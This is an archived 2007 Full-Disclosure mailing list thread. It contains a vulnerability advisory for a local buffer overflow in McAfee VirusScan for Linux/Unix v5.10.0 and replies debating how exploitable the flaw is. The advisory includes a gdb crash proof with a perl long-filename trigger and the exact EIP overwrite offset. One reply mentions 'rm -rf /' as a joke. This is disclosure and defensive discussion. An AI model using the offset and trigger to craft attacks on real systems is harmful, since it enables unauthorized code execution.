Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Dear Joey Mengele, Of cause, it's mitigating factor. But: default PATH_MAX under Linux is 4096, and it's not hard to create file/folder with longer path, it's impossible to access it, E.g. folder with path longer than PATH_MAX: bash$ pwd pwd: could not get current directory: getcwd: cannot access parent directories: Result too large bash$ ls job-working-directory: could not get current directory: getcwd: cannot access parent directories: Result too large Access is not required in this case. It's possible to create _searchable_ files with the length up to approximately MAX_PATH + NAME_MAX. It's more than required to exploit (4128). --Wednesday, August 15, 2007, 9:34:50 PM, you wrote to [EMAIL PROTECTED]: JM You are playing handpuppet of the jackass, actually. Check PATH_MAX JM in the Linux Kernel. JM J JM On Wed, 15 Aug 2007 12:53:18 -0400 monikerd [EMAIL PROTECTED] JM wrote: Joey Mengele wrote: Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario? J I'll play advocate of the devil then. Imagine a wiki running on a webserver, that allows anybody to create new topics which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to twart most usual attacks .. If you could create an arbitrary long topic, then you *might* be able to execute some code, when some cronjob would scan the drive and come across the file? creating files is a different privilege than running code. Hence imho it's not a bogus advisory. another possibility would be to create an archive that extracts an incredibly long filename perhaps? scanning an archive before/after it's extracted is a pretty common event i guess. JM -- JM Click for free information on accounting careers, $150 hour potential. JM http://tagline.hushmail.com/fc/Ioyw6h4dCaNyraR2kkZ8KcMCiTJDWZokEDbswig9iZ5cvsPFFYamWc/ JM ___ JM Full-Disclosure - We believe in it. JM Charter: http://lists.grok.org.uk/full-disclosure-charter.html JM Hosted and sponsored by Secunia - http://secunia.com/ -- ~/ZARAZA http://securityvulns.com/ ...без дубинки никогда не принимался он за программирование. (Лем) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I - TITLE Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow II - SUMMARY Description: Local buffer overflow vulnerability in McAfee Virus Scan for Linux and Unix allows arbitrary code execution Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) Date: August 15th, 2007 Severity: Low-Medium References: http://www.devtarget.org/mcafee-advisory-08-2007.txt III - OVERVIEW McAfee Virus Scan for Linux and Unix is a command-line version of the popular McAfee anti-virus scanner running on the Linux operating system as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was discovered that the product is prone to a classic buffer overflow vulnerability when attempting to scan files or directories with a particularly long name. This vulnerability results in the local execution of arbitrary code with the privileges of the user running the scanner, privilege escalation is by default not possible. Remote exploitation appears to be infeasible due to file length limitations in popular file systems. IV - DETAILS The overflow occurs when the product tries to scan a file or directory with a name that is longer than a certain size (approx. 4124+ bytes). For example on a Debian Linux 3.1 test system, it takes 4124+4 bytes to successfully overwrite the EIP register and thus execute arbitrary code: # /usr/local/uvscan/uvscan --version Virus Scan for Linux v5.10.0 Copyright (c) 1992-2006 McAfee, Inc. All rights reserved. (408) 988-3832 EVALUATION COPY - May 26 2006 Scan engine v5.1.00 for Linux. Virus data file v4777 created Jun 05 2006 Scanning for 194376 viruses, trojans and variants. # gdb /usr/local/uvscan/uvscan GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type show copying to see the conditions. There is absolutely no warranty for GDB. Type show warranty for details. This GDB was configured as i386-linux...(no debugging symbols found) Using host libthread_db library /lib/tls/libthread_db.so.1. (gdb) run `perl -e 'print Ax4124 . Bx4'` Starting program: /usr/local/uvscan/uvscan `perl -e 'print Ax4124 . Bx4'` (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) [Thread debugging using libthread_db enabled] [New Thread 1080238208 (LWP 2461)] (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1080238208 (LWP 2461)] 0x42424242 in ?? () (gdb) info registers eax0x1 1 ecx0x8068430134644784 edx0x1 1 ebx0x41414141 1094795585 esp0xbfffdc40 0xbfffdc40 ebp0x41414141 0x41414141 esi0x41414141 1094795585 edi0x41414141 1094795585 eip0x42424242 0x42424242 eflags 0x282642 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 V - EXPLOIT CODE An exploit for this vulnerability has been developed but will not released to the general public at this time. VI - WORKAROUND/FIX To address this problem, the vendor has released McAfee VirusScan Command Line Scanner for Linux and Unix version 5.20. Thus all users of the product are asked to test and install this patch as soon as possible. McAfee has also published a dedicated security bulletin that covers the problem (see https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576sliceId=SAL_Publiccommand=showforward=nonthreadedKCkcId=613576). VII - DISCLOSURE TIMELINE 18. December 2006 - Notified [EMAIL PROTECTED] 19. December 2006 - Vendor responded that vulnerability is being investigated 19. December to 15. August 2007 - Weekly vendor report on the progress of the development of the patch 01. August 2007 - Release of patch 15. August 2007 - Public disclosure -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGwvgWd8QFWG1Rza8RAjyeAKC6zp+l6CwLw6/eQ80c6CDue4DpUwCdHtS9 pUdSpbqcZz1QkpM/YDc0dN4= =PUZy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario? J P.S. We all know this advisory is bullshit, you should have sold it to WabiSabiLabi LOLOLOL On Wed, 15 Aug 2007 08:56:54 -0400 Sebastian Wolfgarten [EMAIL PROTECTED] wrote: I - TITLE Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow II - SUMMARY Description: Local buffer overflow vulnerability in McAfee Virus Scan for Linux and Unix allows arbitrary code execution Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) Date: August 15th, 2007 Severity: Low-Medium References: http://www.devtarget.org/mcafee-advisory-08-2007.txt III - OVERVIEW McAfee Virus Scan for Linux and Unix is a command-line version of the popular McAfee anti-virus scanner running on the Linux operating system as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was discovered that the product is prone to a classic buffer overflow vulnerability when attempting to scan files or directories with a particularly long name. This vulnerability results in the local execution of arbitrary code with the privileges of the user running the scanner, privilege escalation is by default not possible. Remote exploitation appears to be infeasible due to file length limitations in popular file systems. IV - DETAILS The overflow occurs when the product tries to scan a file or directory with a name that is longer than a certain size (approx. 4124+ bytes). For example on a Debian Linux 3.1 test system, it takes 4124+4 bytes to successfully overwrite the EIP register and thus execute arbitrary code: # /usr/local/uvscan/uvscan --version Virus Scan for Linux v5.10.0 Copyright (c) 1992-2006 McAfee, Inc. All rights reserved. (408) 988-3832 EVALUATION COPY - May 26 2006 Scan engine v5.1.00 for Linux. Virus data file v4777 created Jun 05 2006 Scanning for 194376 viruses, trojans and variants. # gdb /usr/local/uvscan/uvscan GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type show copying to see the conditions. There is absolutely no warranty for GDB. Type show warranty for details. This GDB was configured as i386-linux...(no debugging symbols found) Using host libthread_db library /lib/tls/libthread_db.so.1. (gdb) run `perl -e 'print Ax4124 . Bx4'` Starting program: /usr/local/uvscan/uvscan `perl -e 'print Ax4124 . Bx4'` (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) [Thread debugging using libthread_db enabled] [New Thread 1080238208 (LWP 2461)] (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1080238208 (LWP 2461)] 0x42424242 in ?? () (gdb) info registers eax0x1 1 ecx0x8068430134644784 edx0x1 1 ebx0x41414141 1094795585 esp0xbfffdc40 0xbfffdc40 ebp0x41414141 0x41414141 esi0x41414141 1094795585 edi0x41414141 1094795585 eip0x42424242 0x42424242 eflags 0x282642 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 V - EXPLOIT CODE An exploit for this vulnerability has been developed but will not released to the general public at this time. VI - WORKAROUND/FIX To address this problem, the vendor has released McAfee VirusScan Command Line Scanner for Linux and Unix version 5.20. Thus all users of the product are asked to test and install this patch as soon as possible. McAfee has also published a dedicated security bulletin that covers the problem (see https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=61 3576sliceId=SAL_Publiccommand=showforward=nonthreadedKCkcId=613 576). VII - DISCLOSURE TIMELINE 18. December 2006 - Notified [EMAIL PROTECTED] 19. December 2006 - Vendor responded that vulnerability is being investigated 19. December to 15. August 2007 - Weekly vendor report on the progress of the development of the patch 01. August 2007 - Release of patch 15. August 2007 - Public disclosure -- Click to become a master chef, own a restaurant and make millions. http://tagline.hushmail.com/fc/Ioyw6h4eAFZexjoyRjzeiNugNCYHByYgDcZbE142fg5zU8vki64fmI/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
V - EXPLOIT CODE An exploit for this vulnerability has been developed but will not released to the general public at this time. Don't ever release that to general public. Why would we like to run rm -rf / in such a funny way? I can type the command in the shell if all I want to do is attack myself. ;-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Joey Mengele wrote: Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario? J I'll play advocate of the devil then. Imagine a wiki running on a webserver, that allows anybody to create new topics which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to twart most usual attacks .. If you could create an arbitrary long topic, then you *might* be able to execute some code, when some cronjob would scan the drive and come across the file? creating files is a different privilege than running code. Hence imho it's not a bogus advisory. another possibility would be to create an archive that extracts an incredibly long filename perhaps? scanning an archive before/after it's extracted is a pretty common event i guess. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Imagine this... One linux system maintained by admin. I do not have root access but I can create and edit fles. Admin runs virus scan. I create an exploit file. It exploits virus scan. I get the privileges of the user running the virus scan. --- Harry Muchow [EMAIL PROTECTED] wrote: V - EXPLOIT CODE An exploit for this vulnerability has been developed but will not released to the general public at this time. Don't ever release that to general public. Why would we like to run rm -rf / in such a funny way? I can type the command in the shell if all I want to do is attack myself. ;-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sick sense of humor? Visit Yahoo! TV's Comedy with an Edge to see what's on, when. http://tv.yahoo.com/collections/222 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
But Joey as I said before, maybe somebody assigned SUID root privileges to the scanner to enable ordinary users to run the scanner? I know this is not the case by default but it might happen (and will result in a local privilege escalation). For instance, in a similar buffer overflow that I discovered earlier this year in Trend Micro's virus scanner this was the exact problem... Best regards, Sebastian You are playing handpuppet of the jackass, actually. Check PATH_MAX in the Linux Kernel. J On Wed, 15 Aug 2007 12:53:18 -0400 monikerd [EMAIL PROTECTED] wrote: Joey Mengele wrote: Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario? J I'll play advocate of the devil then. Imagine a wiki running on a webserver, that allows anybody to create new topics which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to twart most usual attacks .. If you could create an arbitrary long topic, then you *might* be able to execute some code, when some cronjob would scan the drive and come across the file? creating files is a different privilege than running code. Hence imho it's not a bogus advisory. another possibility would be to create an archive that extracts an incredibly long filename perhaps? scanning an archive before/after it's extracted is a pretty common event i guess. -- Truck Rentals - Click Here. http://tagline.hushmail.com/fc/Ioyw6h4deMfubiVvi7gHv4s7CdhKJ8kEwJlfzSquIJmjLCuoP1m9Dv/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
You are playing handpuppet of the jackass, actually. Check PATH_MAX in the Linux Kernel. J On Wed, 15 Aug 2007 12:53:18 -0400 monikerd [EMAIL PROTECTED] wrote: Joey Mengele wrote: Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario? J I'll play advocate of the devil then. Imagine a wiki running on a webserver, that allows anybody to create new topics which end up in /articles/[Topic].txt with sufficient .htaccess stuff in /articles to twart most usual attacks .. If you could create an arbitrary long topic, then you *might* be able to execute some code, when some cronjob would scan the drive and come across the file? creating files is a different privilege than running code. Hence imho it's not a bogus advisory. another possibility would be to create an archive that extracts an incredibly long filename perhaps? scanning an archive before/after it's extracted is a pretty common event i guess. -- Click for free information on accounting careers, $150 hour potential. http://tagline.hushmail.com/fc/Ioyw6h4dCaNyraR2kkZ8KcMCiTJDWZokEDbswig9iZ5cvsPFFYamWc/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
Security comes into play here because a user can create a malicious play that would overflow the virus scan. Consequently the user can execute code with the privileges of the user running virus scan. Thus, it is a local privilege escalation scenario. Date: Wed, 15 Aug 2007 18:53:18 +0200 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] CC: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow Joey Mengele wrote: Where does security come into play here? This is a local crash in a non setuid binary. I would like to hear your remote exploitation scenario. Or perhaps your local privilege escalation scenario? J _ With Windows Live Hotmail, you can personalize your inbox with your favorite color. www.windowslive-hotmail.com/learnmore/personalize.html?locale=en-usocid=TXT_TAGLM_HMWL_reten_addcolor_0607 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/